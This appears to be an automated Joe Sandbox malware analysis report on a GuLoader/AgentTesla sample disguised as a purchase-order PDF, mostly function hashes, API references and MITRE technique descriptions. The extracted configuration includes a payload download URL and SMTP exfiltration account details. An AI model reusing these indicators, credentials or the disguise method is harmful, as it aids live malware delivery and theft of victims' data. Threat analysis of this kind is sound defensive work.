Opcode Fuzzy Hash: 4632cb78c0e062b87f8eef7ebad52b5e0e0e0ac0e077d4d94312859e3a2461d2
Instruction Fuzzy Hash: 8C51B7B0D087848FDB01CFA9D9987DEBFF0EF49304F10819AD059AB6A1C7746884CB62

Uniqueness

Uniqueness Score: -1.00%

Function 1E066940 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 1E0669A0
GetCurrentThread.KERNEL32 ref: 1E0669DD
GetCurrentProcess.KERNEL32 ref: 1E066A1A
GetCurrentThreadId.KERNEL32 ref: 1E066A73

Strings

X8; , xrefs: 1E066A5E

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: Current$ProcessThread
String ID: X8;
API String ID: 2063062207-39420809
Opcode ID: 389bf3a55e5d3ef2153fb05bd68aec6c249c83e4b40e78dd4f92f2bda270c21a
Instruction ID: 6dc0b922c710d18de420e65ab17d577517d0725a0e1e696941c42c21579bb89a
Opcode Fuzzy Hash: 389bf3a55e5d3ef2153fb05bd68aec6c249c83e4b40e78dd4f92f2bda270c21a
Instruction Fuzzy Hash: 465145B09006489FDB14CFAAD9887DEBBF5EF48314F208159E519A7250D7746844CF66

Uniqueness

Uniqueness Score: -1.00%

Function 0130EA41 Relevance: 1.7, APIs: 1, Instructions: 151
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 0130EB42

Memory Dump Source

Source File: 00000007.00000002.557744983.000000000130E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0130E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_130e000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: c67bb0304a1edc63ff743339c9b31f130c7cdecf33489c80b234d00f51399a98
Instruction ID: 593bab14b3dfb6c5bf4dbf3790eae7b488043472e05b2cebcb25a34da3e56439
Opcode Fuzzy Hash: c67bb0304a1edc63ff743339c9b31f130c7cdecf33489c80b234d00f51399a98
Instruction Fuzzy Hash: 984106307453158FDF268E28C5B87E537E2AF06718F5985BACC864B2D6D73684C4CB02

Uniqueness

Uniqueness Score: -1.00%

Function 1E065084 Relevance: 1.6, APIs: 1, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E0651A2

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 6198eec906f99bc70c3ddb23850c781c7f9bdd7046b0a3c98f1fcc067685edc9
Instruction ID: a8244d7fcb95b108c23b3d9f671161391473c963705a9e0496a77aa796781a1d
Opcode Fuzzy Hash: 6198eec906f99bc70c3ddb23850c781c7f9bdd7046b0a3c98f1fcc067685edc9
Instruction Fuzzy Hash: 0151D1B1D103499FDF14CFA9D884ADEBBB2BF48314F20862AE819AB210D7759945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E065090 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1E0651A2

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b47d967ca4d9686f6d0d6613b9cf69863532e6c17036842cbd06ecfc23f4145e
Instruction ID: f9d1f7db3664cc744d914ce3851090f55563da94d61740e643dc2739cad58a26
Opcode Fuzzy Hash: b47d967ca4d9686f6d0d6613b9cf69863532e6c17036842cbd06ecfc23f4145e
Instruction Fuzzy Hash: AF41C2B1D103499FDF14CF99C884ADEBBF6BF48314F60862AE819AB210D7759845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0130EAA7 Relevance: 1.6, APIs: 1, Instructions: 100
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 0130EB42

Memory Dump Source

Source File: 00000007.00000002.557744983.000000000130E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0130E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_130e000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 42c3b0902a265160a85837cc9592b0f98c8a622e63eccf90c7b6ebcef26ff200
Instruction ID: a93e2da6bea2552f93b681f5fa3b46c60224d573ab063b81acf70e4f1427ae90
Opcode Fuzzy Hash: 42c3b0902a265160a85837cc9592b0f98c8a622e63eccf90c7b6ebcef26ff200
Instruction Fuzzy Hash: 72312430B05315CFDF2A8F28C5B87E53BE2AF45758F1985A9C8850B2E6D33644C5CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0130EA7A Relevance: 1.6, APIs: 1, Instructions: 99
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 0130EB42

Memory Dump Source

Source File: 00000007.00000002.557744983.000000000130E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0130E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_130e000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f47a917469e1726b935ec1e1d50e4f9736fa66112dc1c058e851001bce4ca929
Instruction ID: 166b4db5f74aa8b39b19afa8e8c3683895123cd4351400447aeea31e839c1a7b
Opcode Fuzzy Hash: f47a917469e1726b935ec1e1d50e4f9736fa66112dc1c058e851001bce4ca929
Instruction Fuzzy Hash: 9831F230B05315CFDF2A8F28C5B87E53BE2AF46718F5985A9C9860B2E6D33644C5CB06

Uniqueness

Uniqueness Score: -1.00%

Function 1E067780 Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1E067F09

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: aab24ee828e7012c693cfd0667132cb89948c86763e82e68c333a06b1207b324
Instruction ID: 6c6b57823bd117684c7c9657d27f50e10aad1e49f091b3e206c1dfee0c44f8f5
Opcode Fuzzy Hash: aab24ee828e7012c693cfd0667132cb89948c86763e82e68c333a06b1207b324
Instruction Fuzzy Hash: 224125B5A002458FDB04CF99C488BAABBF5FF8C314F29C559E519AB321D775A841CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0130EB36 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32 ref: 0130EB42

Memory Dump Source

Source File: 00000007.00000002.557744983.000000000130E000.00000040.00000400.00020000.00000000.sdmp, Offset: 0130E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_130e000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: b5af843a8e4329fff599a8e2c4c03784839ed3a290ea6750d5b981f24d009d6d
Instruction ID: 1ddd4c6a6bd9a46e4486e7a55c159eb92fb25c983e825c44c63a83c92f658c2b
Opcode Fuzzy Hash: b5af843a8e4329fff599a8e2c4c03784839ed3a290ea6750d5b981f24d009d6d
Instruction Fuzzy Hash: 2B217230B45715CFDF27CA18C5B87A177E29F06669F5D8AA9C9850B2E3C33688C5DB02

Uniqueness

Uniqueness Score: -1.00%

Function 1E066B62 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E066BEF

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ab1aa985dae5ebcf620835b86d0a291c77bf293c27789ccdf589f2e63bfa8e4b
Instruction ID: 71c8f7972bd1426e3dfd9e0329102fea91238171a82afded044f1bdd9b1d9982
Opcode Fuzzy Hash: ab1aa985dae5ebcf620835b86d0a291c77bf293c27789ccdf589f2e63bfa8e4b
Instruction Fuzzy Hash: 5D2100B5D00248AFDB10CFA9D984AEEBBF4EF48310F14801AE915A7250C378A944CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1E066B68 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1E066BEF

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7e8c094c4f15f68a7c8bc1f67b2476b76b772fc6991e35557aa26ace5c3b85b7
Instruction ID: ff2f5e925bac72d0c303417b63836854c3e5214ee8ba07f78614f28c0089fa45
Opcode Fuzzy Hash: 7e8c094c4f15f68a7c8bc1f67b2476b76b772fc6991e35557aa26ace5c3b85b7
Instruction Fuzzy Hash: AF21C4B59002489FDB10CFA9D984ADEBBF5EF49310F14841AE915A7350D374A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E06BE79 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1E06BF02

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: c486056446652ab04305ab4dee0859edb6dc7326cdda123ead76ce12955f6d49
Instruction ID: 1ffe72eaf7ad07d325fe2c8695806f2b844ff2e6210a22849507a7ee43d7613d
Opcode Fuzzy Hash: c486056446652ab04305ab4dee0859edb6dc7326cdda123ead76ce12955f6d49
Instruction Fuzzy Hash: 1021DCB0909B858FCB20CFA9C9083CEBFF0EB4A314F14826AD046B7642C3395804CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1E06BE88 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1E06BF02

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 49f1c036943eff61d9c3c1e6128f4294d2245a270d707927e695b2cc63e7e88a
Instruction ID: 10cea4455a3ce6770721ec441707d1f927054a4084c543fe475aa56c76d137a5
Opcode Fuzzy Hash: 49f1c036943eff61d9c3c1e6128f4294d2245a270d707927e695b2cc63e7e88a
Instruction Fuzzy Hash: 23119AB0914B498FDB20DFA9C90878EBBF4EB49314F10812AD405B7641C779A904CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DF7D53C Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.566975217.000000001DF7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DF7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1df7d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa3b46c7cc80ff561a3ac2ffd8b69c4b8843a1fe0c9a345b0d3777bdfd68cccf
Instruction ID: 140c3f5bcc7ef8a8b8e10c5547de87b4b98848e65b46fb02b531264fbb1a596c
Opcode Fuzzy Hash: fa3b46c7cc80ff561a3ac2ffd8b69c4b8843a1fe0c9a345b0d3777bdfd68cccf
Instruction Fuzzy Hash: EE21F4B2504240DFDB01DF18DDC0B56BF66FB84618F20C56AE8094B286C376D956C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 1DF8D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.567011881.000000001DF8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DF8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1df8d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 697f2c78e9de34053726c2568ce59bce9c15674cebe975fd654a947c86a94dab
Instruction ID: 9ea9db4c88de6020f02fda25bee9f69ef8ee34515402ea0cf5c7b678f523d8c9
Opcode Fuzzy Hash: 697f2c78e9de34053726c2568ce59bce9c15674cebe975fd654a947c86a94dab
Instruction Fuzzy Hash: A921CF71504280DFDB05CF28D9C4B16BB65FF88618F28C969E8494B28BC33BD946CA63

Uniqueness

Uniqueness Score: -1.00%

Function 1DF8D005 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.567011881.000000001DF8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DF8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1df8d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a51677497e79a58750bc21d247852f15cf6911a822880b558b5a7a520c9ff352
Instruction ID: b0f99a38f2ac3dca36e3ed3e48100abb4c9ed10135c1a9421612ed12f65c7fcc
Opcode Fuzzy Hash: a51677497e79a58750bc21d247852f15cf6911a822880b558b5a7a520c9ff352
Instruction Fuzzy Hash: 7D217C755087C09FC702CF28D994B11BF61EF46214F28C5AAD8498B297C33A991ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DF7D537 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.566975217.000000001DF7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1DF7D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1df7d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f673778b7a6f784233f2deb979438a87e42aee0a4ee93f804b4ffb7ada55a73d
Instruction ID: fa571b270a43a035c476b09345e24a4e565a491e8823ca6c2f660e3f930d9b23
Opcode Fuzzy Hash: f673778b7a6f784233f2deb979438a87e42aee0a4ee93f804b4ffb7ada55a73d
Instruction Fuzzy Hash: 9D119676504280DFCB01CF14D9C4B56BF72FB84314F24C5AAD8494F656C336D556CBA2

Uniqueness

Uniqueness Score: -1.00%

Source: 00000007.00000000.335904974.0000000001300000.00000040.00000400.00020000.00000000.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/934180388522299433/9350"}
Source: CasPol.exe.5340.5.memstrmin	Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "kubaba@bhgautopartes.comicui4cu2@@mail.bhgautopartes.comkubabareports@bhgautopartes.com"}

Source: Joe Sandbox View	IP Address: 162.159.133.233 162.159.133.233
Source: Joe Sandbox View	IP Address: 162.159.133.233 162.159.133.233

Source: ORDEN DE COMPRA 80107.pdf________________________.exe	Virustotal: Detection: 17%			Perma Link
Source: ORDEN DE COMPRA 80107.pdf________________________.exe	ReversingLabs: Detection: 23%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ORDEN DE COMPRA 80107.pdf________________________.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: GuLoader

Threatname: Agenttesla

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\~DF3DFDC0A18C6E3284.TMP

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
ORDEN DE COMPRA 80107.pdf________________________.exe

Function 004015B8 Relevance: 4.3, APIs: 1, Strings: 1, Instructions: 809
COMMONCrypto

Function 00413579 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 173
memoryCOMMON

Function 0041357E Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 172
memoryCOMMON

Function 00424314 Relevance: 415.0, APIs: 220, Strings: 16, Instructions: 1996
COMMON

Function 00427566 Relevance: 151.1, APIs: 77, Strings: 9, Instructions: 634
COMMON

Function 00428930 Relevance: 72.0, APIs: 39, Strings: 2, Instructions: 291
COMMON

Function 00426810 Relevance: 66.8, APIs: 34, Strings: 4, Instructions: 252
COMMON

Function 0041128D Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 207
COMMON

Function 00411232 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 156
COMMON

Function 0040192D Relevance: .2, Instructions: 156
COMMONCrypto

Function 00426CF9 Relevance: 102.3, APIs: 68, Instructions: 317
COMMON

Function 00411225 Relevance: 75.5, APIs: 41, Strings: 2, Instructions: 263
COMMON

Function 00427158 Relevance: 70.3, APIs: 38, Strings: 2, Instructions: 264
COMMON

Function 00428242 Relevance: 63.3, APIs: 35, Strings: 1, Instructions: 255
COMMON

Function 00427EBE Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 212
COMMON

Function 0042645D Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 165
COMMON

Function 004286F9 Relevance: 25.7, APIs: 17, Instructions: 160
COMMON

Function 00426BBC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74
COMMON

Function 0041123F Relevance: 15.1, APIs: 10, Instructions: 108
COMMON

Function 004266C1 Relevance: 12.1, APIs: 8, Instructions: 95
COMMON

Function 00426334 Relevance: 12.1, APIs: 8, Instructions: 77
COMMON